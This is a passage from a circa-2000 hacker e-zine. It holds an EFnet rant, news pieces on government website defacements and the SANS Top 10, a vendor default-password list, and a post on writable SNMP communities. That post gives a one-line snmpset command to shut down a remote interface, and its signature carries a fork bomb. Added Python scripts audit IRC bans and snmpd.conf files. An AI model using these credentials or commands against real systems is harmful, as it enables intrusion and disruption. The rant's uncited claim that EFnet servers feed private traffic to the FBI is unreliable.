      willed opinionated individuals want to throw their inflated power
      fed egos around causing chaos in our midst. Deal with the issues
      correct the wrongs and continue on. Don't just abandon ship and
      move on hoping the next one doesn't develop some of the SAME
      holes.... - my 2c (See article on EFnet owning later in this issue)
       :- Cruciphux
      
      Date: Unknown, I'd say 1995-8 but could be wrong.
      
      And now, the file:
      
      *****************************************************************
      
                        Why EFnet sucks
                        ===============
      
      * The four main reasons
      * The summary
      * The conclusion
      
      1. Rules
      The policies of efnet are certainly hypocritical. The main goal
      of efnet was to provide a free network with a minimum of "laws"
      that ensure its stability. The main idea was to create a network
      where no channels, nicknames, or other virtual resources within
      irc are "owned" by anyone. One main statute was also that irc
      operators don't get involved in channel and user matters, as long
      as it is not relevant to an actual problem with an irc server.
      Look at efnet today, many opers abuse their powers, get involved in
      senseless conflicts, take over channels and certain nicknames,
      sometimes in co-operation with takeover groups, and hire untalented
      accomplices to find bots, spammers or "deal" with "abusers".
      
      2. Routing and Administration
      The efnet team is incapable of agreeing on many, many things.
      They don't manage to use a uniform version of the ircd code,
      some servers never upgrade, others upgrade always without asking
      others, etc. This results in a chaotic ircd infrastructure, and
      some servers vulnerable to certain channel security problems, while
      others are not, or vulnerable to other problems. The efnet guidelines
      to get a link to the efnet backbone are also very inefficient. While
      some powerful servers with high bandwidth are denied links because
      their link is declined in the act of voting, instead of following
      objective guidelines, other people's servers who are already known
      to the efnet team because they're oper or anything are accepted
      even if they do not provide appropriate resources. IRC Operators
      tend to non-tolerated behavior (abuse, random klines) and many have
      lost their o-lines, while others, who have more "authority", can
      get away with almost everything.
      
      3. Ircd development
      Both ircd servers, the version developed by the hybrid team, and
      the version developed by Chris Behrens are not coded with optimization
      and an increase of user functionality in mind, but instead
      more and more paranoid fixes and flood detection are applied to
      them, with the goal to give the opers more "power" over their
      network, and to automatically detect abuse without doing much.
      As mentioned before, the actual guidelines of efnet do originally
      permit many of the kinds of "abuse", like channel takeovers,
      running bots, etc. Nevertheless, the recent security features
      do actually cripple the functionality of the efnet network.
      Examples for hybrid5 / CS irc daemons:
      - opers can cycle channels without delay, they can set channel modes
        without delay, while normal users' requests are delayed intentionally
      - opers can gain channel ops on netsplits, while it is almost
        impossible for users, resulting in increased attacking of the
        servers by takeover groups to cause them to split more frequently
      - users who do not send messages for a certain time are disconnected,
        forcing all efnet servers to have a policy against idling
      - joining a channel and parting it immediately, as well as
        channel CTCP requests, will alert every oper on the server
        telling them your private channel name, your nickname, and
        if a tcm (monitoring bot) is running, it will automatically
        suggest the server operators to k-line the user
        because of cycling or ctcp'ing a channel.
      Examples for hybrid6 (will be the new standard):
      - The normal user can no longer request STATS information, and
        other such like versions from a remote irc server, disabling
        a user with a problem to get administrative info or a list
        of active operators from that server he could request help from.
      - Multiple targets for messaging and noticing are no longer
        supported. This breaks the RFC for IRC again, and it will
        force many users to re-write their scripts or even clients.
      - Ban exemption like on ircd 2.10 is now supported, with all
        its vulnerability. Many clients cannot recognize +e modes,
        and it can be used in channel take over, to make flooders/takers
        unable to be banned out of a channel until the mode is removed.
      
      If all this is not enough, there is confirmed insider information,
      that four major efnet servers are currently running in debug
      mode, which enables them to see ALL private traffic, like
      private chat, passwords sent to channel protection bots, messages,
      etc. and the information is being filtered and sent to the
      FBI, which requested this. Currently, a big EDU server, an
      .ORG server, an European server, and a server of a major ISP
      which are all linked to efnet, are monitoring traffic via DEBUG MODE.
      
      4. Channel takeover groups
      Takeover has always been present on efnet, and in the
      past it has not been a big threat to servers or users. However,
      the new wave of takeover people is using high-bandwidth attacks
      against servers and users, causing severe damage to everyone,
      and threatening the major channels of efnet which are their
      primary target. One problem is, that "new school" takeover
      people actively compromise hundreds of random servers over
      the internet, with the single purpose to use the boxes with
      high bandwidth connectivity to attack irc servers and irc
      clients. Group members co-operate to gather their power
      against anyone, being a serious threat to anyone they decide
      to attack because of whatever reason. Also, there has been
      a big recent increase of shell services on the internet,
      who offer high-bandwidth access, like it had only been
      available to educational institutions and enterprises before,
      to everyone for prices as low as $5 per month. Today,
      everyone can afford this technology along with fancy long
      hostnames, that look like the hostnames used in spoofing
      attacks some years ago. But note, that these people are
      everything else than hackers. They have merely the knowledge
      on how to configure a bot or irc client and know 3-5 shell
      commands which they also use to attack from their compromised
      hosts and that's all. The problem is, that almost every
      teenager without a clue can nowadays get a shell, fancy
      hostname, which will eventually get him into a group with
      other people like him, who teach him the basic skills of
      compromising a server and running denial-of-service off it.
      
      Summary:
      As a normal user not willing to break into hosts or join
      an online rioting gang, you are helpless against takeovers,
      and the irc ops won't help you either.
      
      As an experienced user or hacker you are attacked by ircops
      because you are "abusive". You can join a 1337 takeover
      group if you can bear to deal with their lameness or stupidity...
      
      As a takeover kiddy you are in the gang of elite vhost
      ownerz and do pretty much what you want, while you attack
      servers with kinds of attack whose damage you probably
      cannot even evaluate. The size of your ego exceeds
      the size of your intellect and you have to play avoid-the
      k-line every day by carding new leet vhosts. If you are
      one of the dumbest sort of take kiddies you waste your
      additional free time with warez. You get what you want
      for the price of having neither a life nor half a mind...
      
      As an irc operator or admin you are always involved in the
      hassle with other opers, who tell you what to do or what not,
      and if you get unpopular, your server will become a target
      for takeover d00ds. You can start becoming mr. evil mass
      k-liner which will undoubtedly escalate the "war", and you
      might succeed to ban the takers and "abuse" with extreme
      aggression, against takers and probably innocent people
      as well, from your server to another one, and/or worse,
      get in more dumb hassle with the ircop "community", maybe
      your o-line removed or your server delinked.
      
      Conclusion:
      Leave EFnet.
      
      Greets to Monk aka Monkster aka Monkiespankr how do you like this one.
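
      The ban exemption (+e) point in section 3 of the treatise can be
      checked from the channel operator's side. The following is an added
      example, not part of the original file or of any ircd: it replays MODE
      lines to rebuild the ban and exempt lists, then reports which members
      match a ban but are shielded by an exemption. The sample lines, nicks,
      hosts and the set of parameter-taking mode letters are constructed
      assumptions.

```python
import re

# Mode letters that consume a parameter. This set is an assumption covering
# common hybrid / ircd 2.10 style letters; adjust it for your server.
PARAM_ALWAYS = set("beIkov")   # parameter on both + and -
PARAM_ON_SET = set("l")        # parameter only when the mode is being set

# Constructed sample data: raw MODE lines as a client receives them.
SAMPLE_MODE_LINES = [
    ":alice!al@staff.example.net MODE #lobby +b *!*@*.dialup.example.org",
    ":carol!c@staff.example.net MODE #lobby +e *!m@*.dialup.example.org",
    ":alice!al@staff.example.net MODE #lobby +lb-v 50 *!*spam@* bob",
    ":alice!al@staff.example.net MODE #lobby -b *!*spam@*",
    ":alice!al@staff.example.net MODE #other +b *!*@*",
]
# Constructed nick!user@host strings of current channel members.
SAMPLE_MEMBERS = [
    "dave!dave@ppp3.dialup.example.org",
    "mallory!m@ppp7.dialup.example.org",
    "erin!erin@host.example.com",
]


def mask_matches(mask, hostmask):
    """Match an IRC mask (* and ? wildcards) against nick!user@host.

    fnmatch is avoided on purpose: it treats '[' as a character class, and
    '[' is a legal nick character. Case folding is plain ASCII here, a
    simplification of the rfc1459 casemapping.
    """
    pieces = []
    for ch in mask:
        if ch == "*":
            pieces.append(".*")
        elif ch == "?":
            pieces.append(".")
        else:
            pieces.append(re.escape(ch))
    return re.fullmatch("".join(pieces), hostmask, re.IGNORECASE) is not None


def replay(lines, channel):
    """Rebuild (bans, exempts) for one channel from raw MODE lines."""
    bans, exempts = set(), set()
    for line in lines:
        parts = line.split()
        if len(parts) < 4 or parts[1] != "MODE":
            continue
        if parts[2].lower() != channel.lower():
            continue
        modestr, params = parts[3], parts[4:]
        adding = True
        for ch in modestr:
            if ch in "+-":
                adding = (ch == "+")
                continue
            takes_param = ch in PARAM_ALWAYS or (adding and ch in PARAM_ON_SET)
            if not takes_param:
                continue
            if not params:          # malformed line: stop rather than guess
                break
            arg = params.pop(0)     # consumed even for letters we do not track,
            if ch == "b":           # so later parameters stay aligned
                (bans.add if adding else bans.discard)(arg)
            elif ch == "e":
                (exempts.add if adding else exempts.discard)(arg)
    return bans, exempts


def audit(members, bans, exempts):
    """Return {hostmask: (status, matching_bans, matching_exempts)}."""
    report = {}
    for hm in members:
        hit_bans = sorted(b for b in bans if mask_matches(b, hm))
        hit_ex = sorted(e for e in exempts if mask_matches(e, hm))
        if not hit_bans:
            status = "clear"
        elif hit_ex:
            status = "shielded"     # ban is set but +e overrides it
        else:
            status = "banned"
        report[hm] = (status, hit_bans, hit_ex)
    return report


def neutralizes_every_ban(mask):
    """True for an exempt mask made only of wildcards, such as *!*@*."""
    return bool(mask) and set(mask) <= set("*?!@")


if __name__ == "__main__":
    bans, exempts = replay(SAMPLE_MODE_LINES, "#lobby")
    for hm, (status, hb, he) in audit(SAMPLE_MEMBERS, bans, exempts).items():
        print(f"{status:9} {hm}  bans={hb} exempts={he}")
    for e in exempts:
        if neutralizes_every_ban(e):
            print("exempt mask overrides every ban:", e)
```

      A client that tracks only +b would list the second member as banned;
      the "shielded" status is what the server actually enforces.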
      
      @HWA      
      

253.0 [HWA] Honeypots: who's fooling who?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      July 2000
      
      By Cruciphux
      
      First of all, what is a honeypot? A honeypot is a phrase coined to
      describe a system that is either intentionally weak in security or is
      placed outside a company's firewall to distract would-be crackers or
      attackers from the real valuable content 'protected' and concealed
      within. 
      
      This practice has been the source of much debate since its inception
      and use by several companies and security outfits on the net, it should
      be noted that honeypots are not the exclusive domain of the good guys 
      ('white hats') currently employing this tactic.
      
      <incomplete>
      
      @HWA
      
      
      


254.0 [IND] Hacking Away At Government
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 2 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_060200a_j.shtml     
      
      6/2/00
      Hacking Away At Government
      By Christopher Swope, Governing Magazine, June 2000
      
      HIGHLIGHT: In the race to get online, network security has been something 
      of an afterthought. But even the most obscure agency can be a target for 
      Internet intruders.

      BODY: "Fresno Means Business" is the first thing you see when you visit 
      the California city's Web page, and to emphasize the point, there is a 
      collage of pictures showing the downtown skyline and business people 
      working. The message, the collage says in so many words, is "Development 
      and Economic Vitality." So you can imagine city officials' displeasure one 
      day last November when the skyline and business people were suddenly gone, 
      replaced with a different message: "Hacked by globher."

      It wasn't the first time Fresno's site had been hacked. Three weeks 
      earlier, another intruder had taken down the site and replaced it with 
      boastful gibberish and profanity. Fortunately, during both incidents, no 
      major damage was done, and each time the city's Web team had the site 
      cleaned up in less than an hour. "We thought we were covered, but they 
      knew the tricks to get into the server," says Allen Smith, Fresno's 
      webmaster. "If we had kept up with Microsoft's security alerts, we would 
      have been OK."

      If officials in Fresno are a bit embarrassed by these incidents, they have 
      plenty of company.

      According to records on Web site defacements kept by attrition.org, a 
      hacking watchdog, more than five dozen state and local governments or 
      agencies were attacked in the six months between November and April. The 
      day after the second hit on Fresno, for example, a hacker who goes by the 
      name "YTCracker" attacked one of the less likely targets in the state of 
      New York: the Department of Agriculture and Markets. Again, no serious 
      harm was done, although it also must have left some in the department 
      blushing. Among other things, the hacker scrawled the quote "YTCracker is 
      cool" under a picture of Governor George Pataki. "The whole episode really 
      woke us up to the possibility that even we can get hacked," says Peter 
      Gregg, a department spokesman. "We figured, who'd want to hack us?"

      By now, most state and local governments have staked out a presence on the 
      Internet, but in the race to get online, network security has been 
      something of an afterthought. What they're starting to find--some of them 
      the hard way--is that anyone on the Internet, even the most obscure 
      government agency, is a target for computer hackers. "It's really a matter 
      of when, not if, you'll be attacked," says Mark Zajicek, a computer 
      security expert with the CERT Coordination Center at Carnegie Mellon 
      University. "Once you connect to the Internet, the rest of the Internet is 
      connected to you."

      Fresno, like most places that have been hit by hackers so far, was lucky: 
      The site contained only such static information as press releases, job 
      listings and city phone numbers. This time around, the hacker attacks 
      amounted to little more than digital graffiti. The damage, in fact, was 
      probably easier to remove than spray paint from a wall.

      In the era of digital government, however, network security will only 
      increase in importance and complexity. Fresno, like nearly every state, 
      city and county, is looking into delivering services online, from tax 
      collection to issuing permits. It is an exciting development, but the flip 
      side is that each new service opens a channel into government computer 
      networks for hackers to exploit.

      Web-enabled government not only exposes a new Achilles heel to malicious 
      hackers but also elevates the battle against them to a new level. To 
      hackers, a digital government is simply a juicier target. There is more 
      havoc to wreak by breaking in, and more notoriety to be gained. To state 
      and local governments, credibility is on the line: The success or failure 
      of their Web ventures will hinge on citizens' faith in their security to 
      use them. "Every time a state or local government moves a new process into 
      the cyber-domain, it raises vulnerability," says Steven Trevino, an 
      executive with Infrastructure Defense Inc., a network security firm that 
      is working with Public Technology Inc. to assess the security needs of 
      local governments. "It's a risk-management proposition they've never had 
      to deal with."
      
      SNIFFING OUT HACKERS
      
      The war on hackers, quite expectedly, has spawned a booming market for 
      security software and hardware. State and local governments are installing 
      firewalls to separate data on internal systems from what goes up on the 
      Web. Soon after being hacked, the New York agriculture department stocked 
      up on intrusion-detection software that can sniff out a hacker's moves 
      before any damage is done. The scary thing, however, is that even vendors 
      who sell the stuff admit that no amount of network protection could keep 
      out the smartest, most dedicated hackers.

      Of course, one doesn't even need to be a computer geek to be a hacker 
      these days. Anyone can learn the basics by visiting a number of Web sites 
      that essentially teach "hacking for dummies" lessons. Even a lot of the 
      technical work of hacking has been automated, in programs that can be 
      downloaded off the Internet for free.

      In many ways, network security is a cat-and-mouse game. Nearly every piece 
      of technology running the Internet today has a bug in it somewhere for 
      hackers to exploit. Companies such as Microsoft are continually issuing 
      security warnings about holes in their software, and offering "patches" 
      that fix the problem. Of course, the bad guys pay attention to these 
      warnings too, and use them as a road map for breaking into systems that 
      haven't been updated. "Just buying the latest commercial products may give 
      you a false sense of security," says Zajicek. "Unless you're continually 
      upgrading, it's just a race between your product and the latest attack 
      methods."

      While spending money on upgrading software and hardware can certainly 
      help, that is the easy part, security experts say. The hard part is 
      cultivating a management culture that recognizes the importance of 
      security and the urgency of addressing security issues quickly. The 
      political need to get more information and new services online as fast as 
      possible often trumps the practical need to have a well-fortified site. 
      Moreover, many state and local IT departments are chronically 
      understaffed, already tugged in a hundred different directions.

      The lesson, management-wise, from a recent security incident in the city 
      of Sunnyvale, California, is that it pays to be proactive. Back in 
      February, at the same time that popular Web sites such as Yahoo!, eBay and 
      CNN.com were being shut down by so-called "distributed denial of service" 
      attacks, Sunnyvale's IT managers noticed that something funny was 
      happening to their site, too. Traffic suddenly shot up six-fold, and 
      engineers determined that much of the increased traffic was coming from 
      one particular address in Virginia. They immediately took measures to 
      block hits from that address, and the problem went away.

      Sunnyvale Chief Information Officer Shawn Hernandez says he's still not 
      sure whether the incident was related to the attacks on Yahoo! and the 
      others. And unlike those attacks, the increased traffic on Sunnyvale's 
      site never peaked high enough to shut it down. That's all the more reason 
      to take a proactive stance. "You have to constantly monitor your network, 
      be familiar with the level of traffic expected, and zero in on that when 
      it fluctuates," Hernandez says. "When you see abnormal situations, you 
      need to investigate and jump on it immediately."
      
      HIRING WHITE HATS
      
      In that vein, security experts say that every government on the Web should 
      be aware of what its security weaknesses are. Some have taken to hiring 
      ethical hackers, or "white hats," who break into their systems in order to 
      assess what holes exist. Ideally, governments should patch those holes up, 
      or at bare minimum, monitor them closely, and should have a plan for 
      dealing with hacker attacks when they do, inevitably, happen. 
      Unfortunately, it is often not until a security breach occurs that a more 
      comprehensive security plan takes shape. By then, of course, it is too 
      late--although not too late to keep it from happening again. It took just 
      13 minutes last March for a hacker to break into the Web page of the 
      Oklahoma Department of Libraries. But it took six days for the department 
      to get the site back up. In the wake of the incident, Web development 
      officer Michael O'Hasson performed an extensive security assessment and 
      shared lessons from the episode at a state Web managers' meeting.

      The lessons read like a self-help pamphlet for techies. "Do not think that 
      obscurity will save you," says one. "Never assume that prior security 
      patches were done before," reads another. The other points make clear the 
      need to have contingency plans in place, such as having a "summer home" 
      for a Web site, an alternate place to host the site in case of emergency.

      In the meantime, the Oklahoma Department of Libraries--like Fresno and a 
      lot of other state and local agencies that thought they were safe--can 
      take comfort in the fact that this round with the hackers has really been 
      something of an exhibition match. It's the next round, with confidential 
      taxpayer data and credit-card numbers at stake, when the score will really 
      count. "The break-in right now is actually good for us," says Allen Smith, 
      the Fresno webmaster. "We don't have that stuff out there now, but we're 
      planning on it. Actually, it's good timing, because it made us more aware 
      of what we need to look at." 
      
      @HWA
      
      
255.0 [IND] The DEPL and other Default password lists
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Compiled by Cruci. (May/Updated/Nov 2000)
      
      Scarfed from the VULNDEV full disclosure security mailing list
      (Security Focus), PacketStorm and other sources.
      
      http://www.phenoelit.de/dpl/dpl.html
      http://packetstorm.securify.com/docs/hack/defaultpasswords.txt
            
      Double edged swords.... use in an ethical manner... unless you REALLY
      must fuck someone over and they like deserve it or some shit. - Ed :-o
      
      
      $Id: dpl.html,v 1.5 2000/07/13 06:06:39 lists Exp lists $
      
      { Included in archive. }
      
      If you did not receive the DEPL in your archive complain to your distributor
      sorry, no refunds, no exchanges.
      
      Supplementary Listing:
      
         
      Default usernames and passwords for Routers/Switches/Hubs and other thingies
    
       Type/vendor/notes/etc                     Username Password
       
       3Com                                      admin    synnet
       3Com                                      read     synnet
       3Com                                      write    synnet
       3Com                                      monitor  monitor
       3Com                                      manager  manager
       3Com                                      security security
       3Com_Office_Connect_5x0_ISDN_Routers      n/a      PASSWORD
       3comCellPlex7000                          tech     tech
       3comCoreBuilder7000/6000/3500/2500        debug    synnet
       3comCoreBuilder7000/6000/3500/2500        tech     tech
       3comHiPerARCv4.1.x                        adm      <blank>
       3ComLANplex2500                           debug    synnet
       3ComLANplex2500                           tech     tech
       3comLinkSwitch2000/2700                   tech     tech
       3comSuperStackIISwitch                    2200     debug
       3comSuperStackIISwitch                    2700     tech
       ACC(Ericsson)                             netman   netman
       ADC_Kentrox_Pacesetter_Router             n/a      secret
       All_Zyxel_equipment                       n/a      1234
       AT&T_3B2_firmware                         n/a      mcp
       AXIS200/240[netcam]                       root     pass
       Bay_routers                               Manager  <blank>
       Bay_routers                               User     <blank>
       Bay350T_Switch                            n/a      NetICs
       BaySuperstackII                           security security
       BRASX/I01_(DataCom)                       n/a      letmein
       BreezeCOM_adapters2.x(console_only)       n/a      laflaf
       BreezeCOM_adapters3.x(console_only)       n/a      Master
       BreezeCOM_adapters4.x(console_only)       n/a      Super
       Cayman_DSL                                n/a      <blank>
       Crystalview_outsideview32                 n/a      crystal
       digiCorp_(viper?)                         n/a      BRIDGE
       digiCorp_(viper?)                         n/a      password
       DLink_hub/switches                        D-Link   D-Link
       Flowpoint_DSL_installed_by_Covad          n/a      password
       Flowpoint_DSL2000                         admin    admin
       Jetform_design                            Jetform  n/a
       Lantronics_Terminal_server_port           7000     n/a
       Linksys_DSL                               n/a      admin
       Livingston_IRX_router                     !root    <blank>
       Livingston_officerouter                   !root    <blank>
       Livingston_portmaster2/3                  !root    <blank>
       Microplex_print_server                    root     root
       Motorola-Cablerouter                      cablecom router
       Netopia_7100                              <blank>  <blank>
       Netopia_9500                              netopia  netopia
       Orbitor_console                           n/a      password
       Orbitor_console                           n/a      BRIDGE
       Osicom(Datacom)                           sysadm   sysadm
       Shiva                                     root     <blank>
       Shiva                                     Guest    <blank>
       SpeedstreamDSL(Efficient)                 n/a      admin
       UClinux_for_UCsimm                        root     uClinux
       Webramp                                   wradmin  trancell
       Alteon ACEswitch 180e (web)               admin    admin
       Alteon ACEswitch 180e (telnet)            admin    <blank>
       NETPrint (all)                            n/a      sysadm
       Xylan Omniswitch                          admin    switch
       Xylan Omniswitch                          diag     switch
       AcceleratedDSL CPE and DSLAM              sysadm   anicust
       Arrowpoint                                admin    system
       Cabletron (routers & switches)            <blank>  <blank>
       
       Needed
       
       Packeteer
       Cabletron
       SMC
       Accton
       
       Contributed by:
       
       Stephen Friedl <friedl@mtndew.com>
       Sebastian Andersson <bofh@diegeekdie.com>
       Jonathan Leto <jonathan@leto.net>
       mat@ivntech.com
       Mike Blomgren <mike.blomgren@knowit.se>
       Knud Erik Højgaard <knud@cybercity.dk>
       mobileunit@mobileunit.org
       Roelof Temmingh <roelof@sensepost.com>
       Axel Dunkel <ad@Dunkel.de>
       Mathias Bogaert <pathos@pandora.be>
       extracts from "Hacking Exposed"
       Jonathan Leto <jonathan@leto.net>
       Chris Owen <chris@totalconnect.com>
       Jim Wildman <jim@rossberry.com>
       Santiago Zapata <szapata@creatos.com.mx>
       Brian S. DuRoss <briand@cac.net>
       Eric Knight <deceased1@HOME.COM>
       Max Vision vision@whitehats.com
       Lou Albano mistert@dslnet.com
       
       Last Updated on Fri Jul 7 02:14:22 SAST 2000
       By Roelof Temmingh
       Email: roelof@sensepost.com 
       
      World writeable SNMP communities:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Days ago, there was a discussion about world-readable snmp communities,
      some people thought it was bad enough. Amazingly, I've found that a lot of
      network devices (such as intelligent switches, WAN/LAN routers, ISDN/DSL
      modems, remote access machines and even some user-end operating systems)
      are by default configured with snmp enabled and unlimited access with
      *write* privileges. It allows an attacker to modify routing tables, status of
      network interfaces and other vital system data, and seems to be extremely
      dangerous. To make things even worse, some devices seem to tell that
      write permission for a given community is disabled, but you can still
      successfully write to it - and other devices won't let you set up snmp
      access at all (eg. some modems and switches).
      
      Here's a brief list of devices I've found with world-writable communities -
      and names of these communities, respectively:
      
      - 3com Switch 3300 (3Com SuperStack II) - private
      - Cray MatchBox router (MR-1110 MatchBox Router/FR 2.01) - private
      - 3com RAS (HiPer Access Router Card) - public
      - Prestige 128 / 128 Plus - public
      - COLTSOHO 2.00.21 - private
      - PRT BRI ISDN router - public
      - CrossCom XL 2 - private
      - WaiLAN Agate 700/800 - public
      - HPJ3245A HP Switch 800T - public
      - ES-2810 FORE ES-2810, Version 2.20 - public
      - Windows NT Version 4.0 - public
      - Windows 98 (not 95) - public
      - Sun/SPARC Ultra 10 (Ultra-5_10) - private
      
      This list is for sure incomplete, and might be inaccurate - it has been
      created after extensive, but only remote tests on devices outside my
      network (usually, these machines are inside ISP networks).
      
      On the following devices, some parameters can be changed, but some can't - so
      it seems to be less dangerous:
      
      - HP LaserJet (EEPROM G.08.03) - public
      - PICO router - public
      - Xyplex Router 6.1.1 - private
      
      Best solutions:
      
      - try to disable unlimited snmp access, if possible, then check if it
        really worked,
      - ask vendor for firmware upgrade,
      - do not route traffic addressed to snmp-enabled devices from outside.
      
      Other systems: Cisco and Motorola routers, Netware, most Unix boxes are
      not vulnerable.
      
      Exploit code:
      
      $ snmpset hostname {private|public} interfaces.ifTable.ifEntry.ifAdminStatus.1 i 2
      
      ...should bring 1st network interface on remote machine down... for more
      interesting options to be set, execute:
      
      $ snmpwalk hostname {private|public}
      
      _______________________________________________________
      Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
      [dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
      [+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
      =-----=> God is real, unless declared integer. <=-----=
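
      An added example, not part of the post above: a configuration audit for
      the condition it describes, a writable community that has a default
      name or accepts any source address. It assumes a net-snmp style
      snmpd.conf (rocommunity/rwcommunity COMMUNITY [SOURCE]); the sample
      configuration and the severity labels are constructed for illustration.

```python
import ipaddress
import shlex

# Community names the post reports as shipped writable by default.
WELL_KNOWN = {"public", "private"}
DIRECTIVES = {"rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"}

# Constructed sample configuration, not taken from any real device.
SAMPLE_CONF = """\
# constructed sample, not taken from any real device
rocommunity public
rwcommunity private
rwcommunity ops-7f3a 10.1.2.0/24
rwcommunity public 0.0.0.0/0      # lab leftover
rwcommunity private 192.0.2.10
rwcommunity ops-7f3a default
"""


def source_is_unrestricted(source):
    """True when SOURCE matches every address (a missing SOURCE means 'default')."""
    if source in (None, "default"):
        return True
    try:
        return ipaddress.ip_network(source, strict=False).prefixlen == 0
    except ValueError:
        return False  # host name or other non-CIDR token: treated as restricted


def audit_snmpd_conf(text):
    """Return [(line_no, severity, community, reason)] for risky community lines."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        try:
            tokens = shlex.split(raw, comments=True)
        except ValueError:  # unbalanced quote: fall back to a plain split
            tokens = raw.split("#", 1)[0].split()
        if not tokens or tokens[0].lower() not in DIRECTIVES:
            continue
        if len(tokens) < 2:
            findings.append((line_no, "error", "", "directive without a community"))
            continue
        writable = tokens[0].lower().startswith("rw")
        community = tokens[1]
        source = tokens[2] if len(tokens) > 2 else None
        open_to_all = source_is_unrestricted(source)
        guessable = community.lower() in WELL_KNOWN
        if writable and open_to_all:
            severity = "critical" if guessable else "high"
            reason = "write access from any source address"
        elif writable and guessable:
            severity, reason = "medium", "write access guarded only by a default name"
        elif open_to_all and guessable:
            severity, reason = "low", "world-readable default community"
        else:
            continue
        findings.append((line_no, severity, community, reason))
    return findings


if __name__ == "__main__":
    for line_no, severity, community, reason in audit_snmpd_conf(SAMPLE_CONF):
        print(f"line {line_no}: [{severity}] {community}: {reason}")
```

      A clean result only describes the configuration file; as the post
      notes, some devices still accept writes after the setting is disabled.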
      
      


      
      @HWA
      
             
256.0 [IND] Security Firm To List Additional Hacking Threats
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 2 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_060200b_j.shtml     
      
      6/2/00
      Security Firm To List Additional Hacking Threats
      By David McGuire, Newsbytes
      WASHINGTON, D.C., U.S.A.,
      02 Jun 2000, 4:49 PM CST
      
      While Thursday's unveiling of the 10 most dire Internet security threats 
      has already generated widespread discussion in the technology community, 
      one cyber-security firm is warning against taking the list at face value.

      Published Thursday by the not-for-profit SANS (System Administration, 
      Networking and Security) Institute, the highly technical "Ten Most 
      Critical Internet Security Threats" list is a valuable document, but 
      should not be seen as the end-all and be-all of security concerns, Network 
      Security Technologies (NETSEC) Vice President Joseph Nowland said today.

      The threats listed in the document are just the "tip on the iceberg," 
      Nowland said, warning network administrators not to feel safe simply 
      because they address the 10 concerns outlined by SANS. NETSEC intends next 
      week to release its own supplemented list of Internet security threats 
      identified by its in-house team of hackers, Nowland said.

      SANS leaders agree that the list of security threats, which reads like 
      Egyptian hieroglyph to the technologically uninitiated, is just a stepping 
      off point for addressing security concerns.

      "All we've done so far is define the problem," Stephen Northcutt, the 
      director of SANS' Global Incident Analysis Center, told Newsbytes on 
      Thursday. "The next step is to create a step-by-step repair (protocol) for 
      every single operating system on the face of the planet."

      Nowland said that NETSEC security experts became concerned when they saw 
      news reports that seemed to indicate that the SANS document was somehow a 
      comprehensive list of cyber-threats.

      Organizations that simply fix those problems and think they are safe would 
      be in for a serious shock, Nowland said. NETSEC's list of additional 
      security threats will include holes not outlined in the SANS list, he 
      added.

      While the SANS Top 10 list, which is posted on the SANS Web site at 
      http://www.sans.org/topten.htm , contains links to patches for some of the 
      threats it enumerates, Northcutt said Thursday that a broader solution 
      will be much longer in coming.
      
      NETSEC's Web site is located at http://www.netsec.net . 
      
      @HWA
      
257.0 [IND] SANS: Top 10 hacker targets
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           Follow-up from previous article
      
      July 11 2000
      
      
      http://www.infowar.com/hacker/00/hack_060200b_j.shtml
      
           How To Eliminate The Ten Most Critical 
           Internet Security Threats
      The Experts Consensus 
      Version 1.24 July 11, 2000
      Copyright 2000, The SANS Institute 
        Log of updates
       
       v. 1.24 - 07/11/00
        Section added naming people who have helped 
        improve this document through their contributions
      v. 1.23 - 07/11/00
        Section 2 CVE List revised and updated
      v. 1.22 - 06/19/00
        Signatories updated 
      v. 1.21 - 06/16/00
        Signatories corrected 
      v. 1.20 - 06/15/00
        # 11 in "Perimeter Protection For An Added Layer 
        of Defense In Depth" section updated
      v. 1.19 - 06/12/00
        Correction - Section 8E moved to 7E. 
      v. 1.18 - 06/08/00
        Updated section 8E and F by adding diagnostic 
        and correction utility.
      v. 1.17 - 06/08/00
        Sections 4A and 4B updated
      v. 1.16 - 06/08/00
        # 11 in "Perimeter Protection For An Added Layer 
        of Defense In Depth" section updated
      v. 1.15 - 06/06/00
        Signatories corrected 
      v. 1.14 - 06/04/00
        Signatories corrected 
      v. 1.13 - 06/02/00
        Section 5A and 5B updated, 5C removed
      v. 1.12 - 06/02/00
        Section 7E updated
      v. 1.11 - 06/02/00
        Sections 3B & 6B SGI Software Patches updated 
      Stop the Break-Ins!
      
      The majority of successful attacks on computer systems via the Internet 
      can be traced to exploitation of one of a small number of security flaws. 
      Most of the systems compromised in the Solar Sunrise Pentagon hacking 
      incident were attacked through a single vulnerability. A related flaw was 
      exploited to break into many of the computers later used in massive 
      distributed denial of service attacks. Recent compromises of Windows 
      NT-based web servers are typically traced to entry via a well-known 
      vulnerability. Another vulnerability is widely thought to be the means 
      used to compromise more than 30,000 Linux systems.

      A few software vulnerabilities account for the majority of successful 
      attacks because attackers are opportunistic -- taking the easiest and most 
      convenient route. They exploit the best-known flaws with the most 
      effective and widely available attack tools. They count on organizations 
      not fixing the problems, and they often attack indiscriminately, by 
      scanning the Internet for vulnerable systems.

      System administrators report that they have not corrected these flaws 
      because they simply do not know which of over 500 potential problems are 
      the ones that are most dangerous, and they are too busy to correct them 
      all.

      The information security community is meeting this problem head on by 
      identifying the most critical Internet security problem areas -- the 
      clusters of vulnerabilities that system administrators need to eliminate 
      immediately. This consensus Top Ten list represents an unprecedented 
      example of active cooperation among industry, government, and academia. 
      The participants came together from the most security-conscious federal 
      agencies, from the leading security software vendors and consulting firms, 
      from the top university-based security programs, and from CERT/CC and the 
      SANS Institute. A complete list of participants may be found at the end of 
      this article.

      Here is the experts' list of the Ten Most Often Exploited Internet 
      Security Flaws along with the actions needed to rid your systems of these 
      vulnerabilities. 
      
      Three Notes For Readers:
      
